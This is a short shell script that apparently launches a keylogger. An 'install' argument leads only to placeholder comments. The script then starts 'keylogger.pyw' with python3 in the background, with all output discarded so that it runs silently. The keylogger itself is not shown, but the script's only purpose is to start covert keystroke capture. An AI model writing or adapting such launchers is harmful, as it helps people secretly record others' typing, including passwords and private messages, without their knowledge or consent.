#!/bin/sh 

LOG_INSTALL="false"
if [ $# -ge 1 ]; then
    if [ $1 = "install" ]; then
        LOG_INSTALL="true"
    fi
fi

if [ $LOG_INSTALL == "true" ]; then
  echo "install is true" > /dev/null 2>&1
#install python
#install python scripts
#ignore output= > /dev/null 2>&1
fi


python3 keylogger.pyw > /dev/null 2>&1 &